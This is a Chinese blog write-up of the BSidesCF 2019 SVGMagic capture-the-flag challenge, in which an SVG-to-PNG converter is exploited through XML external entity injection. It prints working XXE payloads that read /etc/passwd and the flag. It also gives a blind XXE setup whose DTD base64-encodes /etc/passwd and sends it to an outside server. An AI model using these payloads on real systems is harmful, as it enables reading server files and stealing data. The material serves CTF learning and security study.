[BSidesCF 2019]SVGMagic (XXE)

最新推荐文章于 2023-03-12 17:05:34 发布
最新推荐文章于 2023-03-12 17:05:34 发布
阅读量1k 收藏 2
点赞数
分类专栏: ssti 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128469332
版权

[BSidesCF 2019]SVGMagic

首先打开界面,感觉就是一个文件上传的题目 ,然后上传了jpg/php/png/.htaccess,感觉不是一道简单的题目,但是抓包也没有什么有用的信息。

页面上的英文翻译过来就是,使用Magic将SVG转换为PNG,所以考察的是SVG但是没遇到过

 搜索svg发现了和xxe的漏洞

 进入文章之后,就看到了svg格式的xxe如下所示,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

普通的xml二者对比,改变不多也就是<svg的标签,和宽高 

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
      <user>
            <username>bob</username>
            <password>passwd2</password>
            <name> Bob</name>
            <email>bob@fakesite.com</email>
            <group>CSAW2019</group>
            <intro>&xxe;</intro>
      </user>
</users>

 然后直接上传  2.svg

读取成功然后就要猜测flag在哪里了,我们并不知道flag的路径,而/proc/self/pwd/代表的是当前路径,可以构造/proc/self/cwd/flag.txt读取文件。当前进程工作目录

然后本来用的f*发现通配符在这不可以使用

 

 

盲注XXE

原理:有回显的情况可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为blind xxe,可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器。

本来想手动搭建一个blindxxe漏洞的场景,但是调试了半天,

报错整的太难受了,以后有能力再来复现。

说一下简单的原理:

首先在本地构建一个靶机,里面是盲注xxe的代码。

然后我们自己使用一个vps,在根目录 /var/www/html 下创建一个a.dtd文件

<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.168.168:8888/?%file;'>">

&#37;   这个其实就是%因为被包含了所以用这个代替

最后burp 抓包靶机,payload为

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/a.dtd">
%remote;%int;%send;
]>

最后发包,%remote先调用,vps上的 dtd文件,然后%int调用读取文件,最后send把读取后的发送到远程vps上,样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。

参考文件:浅析无回显的XXE(Blind XXE) - FreeBuf网络安全行业门户

浅谈SVG的两个黑魔法_svg (sohu.com)

偶尔躲躲乌云334
关注
专栏目录
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
SVGMagic.V1.004.zip
08-27
一个好用的DELPHI SVG库。 SVG全名是可缩放矢量图形(英语:Scalable Vector Graphics,SVG),是一种基于可扩展标记语言(XML),用于描述二维矢量图形的图形格式。 SVG格式具有以下优点: * 图像文件可读,易于修改和编辑(理论上如此,但实际上却是因为各种不同的SVG档编辑器而可能存储成不易解读的SVG文件) * 与现有技术可以互动融合。例如,SVG技术本身的动态部分(包括时序控制和动画)就是基于SMIL标准。另外,SVG文件还可嵌入JavaScript(严格地说,应该是ECMAScript)脚本来控制SVG对象 * SVG图形格式可以方便的创建文字索引,从而实现基于内容的图像搜索 * SVG图形格式支持多种滤镜和特殊效果,在不改变图像内容的前提下可以实现位图格式中类似文字阴影的效果。 * SVG图形格式可以用来动态生成图形。例如,可用SVG动态生成具有交互功能的地图,嵌入网页中,并显示给终端用户。 SVG格式具有以下缺点: * 如何和已经占有重要市场份额的矢量图形格式Adobe Animate竞争的问题。事实上,Adobe Animate在Flash CC 2014版及以后的版本就都支持直接导出SVG文件了。 * SVG的本地运行环境下的厂家支持程度。 * 由于原始的SVG档是遵从XML语法,导致数据采用未压缩的方式存放,因此相较于其他的矢量图形格式,同样的文件内容会比其他的文件格式稍大。Adobe因此使用gzip压缩开发出压缩的SVG档格式,附文件名为 .svgz, 但此种文件格式除了Adobe旗下的软件以外,未被广泛支持使用。 * 旧版的SVG Viewer无法正确显示出使用新版SVG格式的矢量图形。
[BSidesCF 2019]SVGMagic
m0_62905261的博客
10-15 277
[BSidesCF 2019]SVGMagic
BUUCTF--[BSidesCF 2019]SVGMagic
qq_46263951的博客
07-22 1091
进去后是一个这样的页面 这里大标题给出提示使用 MagicSVG 转换为 PNG 那啥是SVG呢,先来了解一下 这里SVG是个XML的图片,并且存在可控的内容 这里可以尝试一下XEE漏洞的这种情况 由于不知道flag的路径,所以先用/proc/self/pwd/代表的是当前路径。可以构造/proc/self/pwd/flag.txt读取文件. 最终构造.svg文件内容为 <?xml version="1.0" encoding="UTF-8"?> <!D..
buu-[BSidesCF 2019]SVGMagic
qaq517384的博客
10-25 301
打开环境是一个svg转png的 参考合天的浅谈SVG的两个黑魔法 由SVG造成的XXE注入 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///etc/passwd" > ]> <svg height="200" width="1000"> <text x="10" y="20">&file;</text&g
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 2355
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
最新发布
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
SVGMagic V1.001.7z
07-10
SVGMagic V1.001.7z
SVGMagic-master
06-13
SVGMagic-master 是一个前端控制svg图片缩放的jquery插件。
SVGMagic:通过即时动态创建PNG版本来回退SVG图像
02-25
SVGMagic-跨浏览器SVG 该存储库不再处于主动维护状态。 事实证明,2013年它非常有用,但是如今,都支持SVG。 该插件将继续工作,但不会保证API的可用性。 这是一个很棒的旅程! 这个易于使用的jQuery插件将为您网站上的.SVG图片创建后备。 当插件注意到访问者浏览器不支持.SVG图像时,它将用新的.PNG图像替换这些图像。 这些.PNG图像是使用服务器端脚本在运行时创建的。 当访问者浏览器确实支持.SVG图像时,它将回到睡眠状态。 SVGMagic的一大优点是您不必创建图像的多个版本。 您可以只关注.SVG图像,然后让SVGMagic完成其余的工作。 您可以在上找到更多信息和演示。 SVG ...什么/为什么? SVG是矢量图形格式,这意味着它具有完美的可伸缩性。 无论需要显示什么尺寸,或需要显示什么屏幕,SVG都能完美适应。 这意味着您可以为桌面和移动(包括R
[BSidesCF 2019]SVGMagic XXESVG注入
qq_54929891的博客
05-13 840
进入题目可以看到叫我们利用魔法将SVG转为PNG,查资料了解一下SVG是个啥东西XML的SVG知识总结_叨唠的博客-CSDN博客_svg xml 是一个图片,既然是XML里面的图片标签,那么则可以往XXE注入里面想想,但是SVG不知道怎么构造浅谈SVG的两个黑魔法 - 知乎 我们可以利用text标签来显现文字,将文字改为引用我们的恶意代码即可 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ &lt...
浅谈SVG的两个黑魔法-xxe
mingyqf的博客
11-19 374
(DozerCTF2020)这道题当时比赛的时候没有做出来,因为当时水平有限,并没有想到svg也是xml格式,可以用来XXE,这道题确实质量可以,学到了很多新的姿势,下面给出我复现的过程。SVG简介SVG(Scalable Vector Graphics)是一种基于XML的二维矢量图格式,和我们平常用的jpg/png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它,目前主流的浏览器都已经支持SVG图片的渲染。
SVG格式进行xss与xxe
yggcwhat
08-14 1577
SVG格式进行xss与xxe
利用SVG进行XSS和XXE
weixin_50464560的博客
03-30 8610
最近我学习了一些新的xss技巧在这里分享给大家! 0x01 JavaScript without parentheses using DOMMatrix 背景 以前我们有两个解决xss不带括号的方法但是都有缺陷: 我们可以使用location=name来加载外部的代码,但是Safari不支持,另外还可以用οnerrοr=alert;throw 1来实现xss,但是现在大多数的waf都会过滤throw 1,因此今天我们就来介绍以下第三种方法。 DOMMatrix 题目的伪代码: 根据上面的要求我们不能使用"’
XXE漏洞深度解析与实战演练
本文档详细介绍了XXE(XML External Entity)漏洞的概念、危害、检测方法、利用技巧以及修复策略,并提供了多个实际案例进行演示。XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值